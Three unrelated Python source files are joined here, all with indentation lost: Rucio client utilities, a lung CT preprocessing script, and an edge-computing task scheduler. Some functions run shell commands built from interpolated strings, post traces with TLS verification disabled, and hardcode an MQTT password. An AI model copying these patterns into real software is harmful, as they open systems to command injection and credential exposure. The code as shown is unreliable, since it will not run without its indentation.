YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Open a UDP socket to a machine on the internet, to get the local IPv4 and IPv6
addresses of the requesting client.
Try to determine the sitename automatically from common environment variables,
in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
use the fixed string 'ROAMING'.
"""
ip = '0.0.0.0'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
ip6 = '::'
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip6 = s.getsockname()[0]
except Exception:
pass
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
return {'ip': ip,
'ip6': ip6,
'fqdn': socket.getfqdn(),
'site': site}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
return base64.b64encode(signature_stream.get_remainder())
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be send
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse.urlparse(url))
mod_query = dict(urlparse.parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlparse.urlunparse(url_parts)
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
:param input_string: String containing a value and an unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
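# Illustrative sketch (not part of the original module): units are decimal and must follow the
# number with no whitespace, otherwise the function returns False.
#   >>> get_bytes_value_from_string('10GB')
#   10000000000
#   >>> get_bytes_value_from_string('10 GB')
#   False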
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
raise ValueError('Length has to be an integer value.')
filters[key] = value
else:
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
return filters, type
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
:param interval: Interval in seconds when the action function should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
time.sleep(interval - ((time.time() - starttime)))
t = threading.Thread(target=start)
return t
def run_cmd_process(cmd, timeout=3600):
"""
shell command parser with timeout
:param cmd: shell command as a string
:param timeout: in seconds
:return: stdout xor stderr, and errorcode
"""
time_start = datetime.datetime.now().second
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
time_now = datetime.datetime.now().second
running_time = int(time_now - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
if 'rse_id' in dictionary.keys():
if 'rse' not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary['rse'] = rucio.core.rse.get_rse_name(rse_id=dictionary['rse_id'])
# if 'vo' not in dictionary.keys():
# if not copied:
# dictionary = dictionary.copy()
# copied = True
# import rucio.core.rse
# dictionary['vo'] = rucio.core.rse.get_rse_vo(rse_id=dictionary['rse_id'])
if 'account' in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
# dictionary['vo'] = dictionary['account'].vo
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
# dictionary['vo'] = dictionary['scope'].vo
dictionary['scope'] = dictionary['scope'].external
return dictionary
|
preprocess_new_lung_data.py
|
import h5py
import SimpleITK as sitk
import os, sys
sys.path.insert(0,os.path.abspath('..'))
sys.path.insert(0,os.path.abspath('.'))
sys.path.insert(0,os.path.abspath('../easyreg'))
import numpy as np
import glob
from easyreg.reg_data_utils import write_list_into_txt
from tools.image_rescale import resize_input_img_and_save_it_as_tmp
from multiprocessing import Process
output_path = "/playpen-raid1/Data/Lung_Registration_clamp_normal"
os.makedirs(output_path,exist_ok=True)
#['Expiration_CT', 'Expiration_CT.key', 'Expiration_CT.missing',
# 'Expiration_CT.origin', 'Expiration_CT.spacing', 'Expiration_labelmap',
# 'Expiration_labelmap.key', 'Expiration_labelmap.missing', 'Expiration_labelmap.origin',
# 'Expiration_labelmap.spacing', 'Inspiration_CT', 'Inspiration_CT.key',
# 'Inspiration_CT.missing', 'Inspiration_CT.origin', 'Inspiration_CT.spacing',
# 'Inspiration_labelmap', 'Inspiration_labelmap.key', 'Inspiration_labelmap.missing',
# 'Inspiration_labelmap.origin', 'Inspiration_labelmap.spacing', 'Inspiration_local_histogram_lm',
# 'Inspiration_local_histogram_lm.key', 'Inspiration_local_histogram_lm.missing',
# 'Inspiration_local_histogram_lm.origin', 'Inspiration_local_histogram_lm.spacing']
def normalize_intensity(img, linear_clip=False):
"""
a numpy image, normalized into the intensity range [0, 1]:
(img-img.min())/(img.max() - img.min())
:param img: image
:param linear_clip: linearly normalize image intensities so that the 95th percentile gets mapped to 0.95; 0 stays 0
:return:
"""
if linear_clip:
img = img - img.min()
normalized_img = img / np.percentile(img, 95) * 0.95
else:
min_intensity = img.min()
max_intensity = img.max()
normalized_img = (img - img.min()) / (max_intensity - min_intensity)
return normalized_img
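# Illustrative sketch (not part of the original script): with the default min-max branch, an image
# with intensities [0, 500, 1000] is mapped to [0.0, 0.5, 1.0].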
def process_image(img, fname, is_label=False):
"""
:param img: numpy image
:return:
"""
if not is_label:
img[img<-1000] = -1000
img[img>1000] = 1000
img = normalize_intensity(img)
else:
img[img != 0] = 1
# img[img==2]=1
# img[img==3]=2
# assert list(np.unique(img))==[0,1,2],"the fname {} has label {} with label 3 density{}".format(fname,list(np.unique(img)),np.sum(img==3))
return img
def process_lung_data(index_list):
h5_path = "/playpen-raid1/Data/UNC_Registration.h5"
f = h5py.File(h5_path, 'r')
modality = ['Expiration_CT','Expiration_labelmap','Inspiration_CT','Inspiration_labelmap','Inspiration_local_histogram_lm']
mod_suffix = ['_img','_label','_img','_label','_hist']
is_label = [False, True, False, True, None]
for ind,mod in enumerate(modality):
atr_key = mod+'.key'
atr_origin = mod + '.origin'
atr_spacing = mod + '.spacing'
for i in index_list:
img = f[mod][i]
img = process_image(img,f[atr_key][i][1],is_label[ind]) if is_label[ind] is not None else img
folder_name = f[atr_key][i][0]
fname = f[atr_key][i][1]
origin = f[atr_origin][i].astype(np.float64)
spacing = f[atr_spacing][i].astype(np.float64)
sitk_img = sitk.GetImageFromArray(img)
sitk_img.SetOrigin(origin)
sitk_img.SetSpacing(spacing)
output_folder = os.path.join(output_path,folder_name)
os.makedirs(output_folder,exist_ok=True)
sitk.WriteImage(sitk_img,os.path.join(output_folder, fname+mod_suffix[ind]+".nii.gz"))
def get_input_file(refer_folder, output_txt):
source_image_path_list = glob.glob(os.path.join(refer_folder,"**","*EXP*img*"))
source_label_path_list = [path.replace("_img.nii.gz","_label.nii.gz") for path in source_image_path_list]
target_image_path_list = [path.replace("_EXP_","_INSP_") for path in source_image_path_list]
target_label_path_list = [path.replace("_img.nii.gz","_label.nii.gz") for path in target_image_path_list]
num_file = len(source_image_path_list)
file_list = [[source_image_path_list[i], target_image_path_list[i], source_label_path_list[i], target_label_path_list[i]] for i in
range(num_file)]
write_list_into_txt(output_txt,file_list)
num_of_workers=20
split_index = np.array_split(np.array(range(999)), num_of_workers)
procs = []
for i in range(num_of_workers):
p = Process(target=process_lung_data, args=(split_index[i],))
p.start()
print("pid:{} start:".format(p.pid))
procs.append(p)
for p in procs:
p.join()
#
# output_path = "/playpen-raid1/zyshen/data/lung_new_reg"
# os.makedirs(output_path,exist_ok=True)
# output_txt = os.path.join(output_path,"pair_path_list.txt")
# get_input_file(output_path,output_txt)
|
algo_three.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlocks are resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records tasks that are re-offloaded to the MEC to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
task_record = {} # keeps record of task reoffloaded
task_id = 0
shared_resource_lock = threading.Lock()
t_track = 1
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
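# Illustrative sketch (not part of the original script): load_tasks() uses lcm() to get the
# hyperperiod of the task set; for the default periods this gives
#   >>> lcm([20, 5, 10, 10, 15])
#   60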
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
# generate execution sequence
def wound_wait(processes, avail, n_need, allocat):
global deadlock
offload = []
# To store execution sequence
exec_seq = []
# Mark which processes are finished (0 = not yet finished)
work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
while 0 in work:
ind = work.index(0)
i = processes[ind]
# print('comparing| process: ', i, n_need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', _need[_max])
if not (False in list(np.greater_equal(np.array(avail) + np.array(allocat[_max]), n_need[i]))):
offload.append(_max)
avail = np.array(avail) + np.array(allocat[_max])
work[processes.index(_max)] = 1
else:
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
if len(offload) > 0:
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print('Execution seq: ', exec_seq)
return exec_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wound_wait(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# waiting time = total waiting time / 2 (using the full average waiting time might be too tight)
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calculate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns the MEC with the minimum average waiting time (0 if no MEC wait times are known yet)
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
# if len(exec_list) != len(offloaded_task[0]):
# print('\n\n', '@ ' * 50)
# print('exec: ', exec_list, 'off: ', offloaded_task[0])
# print('\n\n', '@ ' * 50)
# offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
